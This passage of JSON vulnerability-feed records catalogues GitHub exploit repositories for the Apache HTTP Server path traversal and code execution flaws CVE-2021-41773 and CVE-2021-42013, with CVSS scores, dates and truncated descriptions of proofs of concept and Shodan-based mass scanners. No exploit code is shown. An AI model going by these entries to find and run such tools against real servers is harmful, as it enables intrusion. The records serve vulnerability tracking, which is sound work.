"githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-04-09T05:38:40", "id": "2A177215-CE4A-5FA7-B016-EEAF332D165C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:49:09", "description": "# Apache 2.4.50 - Path Traversal or Remote Code Execution\nCVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T14:29:10", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2023-01-11T03:47:33", "id": "52E13088-9643-5E81-B0A0-B7478BCF1F2C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-28T02:57:15", "description": "# CVE-2021-41773\nPath traversal and file disclosure vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T13:39:57", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-27T21:54:06", "id": "3C5B500C-1858-5834-9D23-38DBE44AE969", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-20T00:21:12", "description": "\u7528\u4e8e\u68c0\u6d4b/\u5229\u7528Apache 2.4.49\u4e0e2.4.50\u4e0a\u7684\u76ee\u5f55\u7a7f\u8d8a/\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\n\n\n\u4f7f\u7528\uff1a\n\n\u6f0f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-10T10:09:52", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-11T04:09:16", "id": "9D511461-7D24-5402-8E2A-58364D6E758F", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\n\napache http server vulnerability (only works 2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T15:00:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-15T19:28:33", "id": "FF610CB4-801A-5D1D-9AC9-ADFC287C8482", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# POC CVE-2021-41773\n## \n\n[\n\nFor educational pur...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T18:56:04", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:37:45", "id": "3AE03E90-26EC-5F91-B84E-F04AF6239A9F", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\n\nHello guys, yesterday The new CVE-2021-41773 f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T12:30:13", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:36:13", "id": "A6753173-D2DC-54CC-A5C4-0751E61F0343", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-11-09T18:33:53", "description": "# Apachuk - CVE-2021-41773 Grabber with Shodan\nGrabber Apache Di...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-11T00:57:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-11-09T18:14:01", "id": "C8799CA3-C88C-5B39-B291-2895BE0D9133", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-11-15T18:22:02", "description": "# CVE-2021-41773\nThis is a sim...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-08T01:13:33", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-11-15T17:45:18", "id": "108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 \r\nPath Traversal in Apache HTTP Server 2.4.49\r\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T16:19:45", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-08T01:15:42", "id": "628A345B-5FD8-5A2F-8782-9125584E4C89", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 scanner\n### This script tests for the path t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-08T08:32:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:53:24", "id": "E9FE319B-26BF-5A75-8C6A-8AE55D7E7615", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-10-01T20:50:44", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-15T09:36:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-09-15T09:36:35", "id": "D10426F3-DF82-5439-AC3E-6CA0A1365A09", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-05-12T07:09:54", "description": "# CVE-2021-41773 Shodan scanner\nCVE-2021-41773 Shodan scanner vi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-12T03:42:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-05-12T03:42:49", "id": "E7B177F6-FA62-52FE-A108-4B8FC8112B7F", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-19T02:00:47", "description": "# CVE-2021-41773 ( Apache / 2.4.49 )\nCVE-2021-41773 exploit by G...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-04T16:19:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-08-04T16:33:22", "id": "DBF996C3-DC2A-5859-B767-6B2FC38F2185", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-05-13T22:09:15", "description": "# CVE-2021-41773 Essay \ud83d\udd78\ufe0f\n\n## Description \ud83d\uddbc\ufe0f\n\nThis repository co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-12T13:23:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-05-13T15:02:27", "id": "749F952B-3ACF-56B2-809D-D66E756BE839", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-09-16T02:04:10", "description": "# CVE-2021-41773\n## \ud83d\udc1b Path traversal and file disclosure vulnera...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-15T12:37:59", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-09-16T01:01:18", "id": "674BA200-C494-57E6-B1B4-1672DDA15D3C", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-09-15T15:23:46", "description": "# CVE-2021-41773-PoC\nPoC for CVE-2021-41773 with docker to demon...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-15T11:01:45", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-09-15T11:02:07", "id": "B58E6202-6D04-5CB0-8529-59713C0E13B8", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-09-20T05:03:43", "description": "# CVE-2021-41773 - Apache HTTP Server 2.4.49\n\n# Cara Menjalankan...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-20T03:45:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-09-20T03:45:37", "id": "CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773-exercise\nA flaw was found in a change made to p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-26T11:02:46", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-01-26T11:22:13", "id": "FFE89CAE-FAA6-5E93-9994-B5F4D0EC2197", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-12T14:47:39", "description": "# CVE-2021-41773\nCVE-2021-41773 POC with Docker\n\n### Configurati...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T02:30:40", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-12T13:45:57", "id": "4E4BAF15-6430-514A-8679-5B9F03584B71", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-11-09T18:33:01", "description": "# CVE-2021-41773 PoC\n\nProof of concept to check if hosts are vul...", "cvss3": {"exploitabilityScore": 3.9, 